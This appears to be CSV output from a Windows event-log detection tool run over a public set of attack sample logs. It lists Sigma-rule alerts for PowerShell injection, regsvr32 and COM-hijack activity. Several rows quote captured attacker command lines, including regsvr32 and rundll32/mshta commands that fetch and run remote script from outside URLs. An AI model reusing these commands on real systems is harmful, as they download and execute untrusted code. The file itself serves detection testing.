Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 
-2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla 
Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
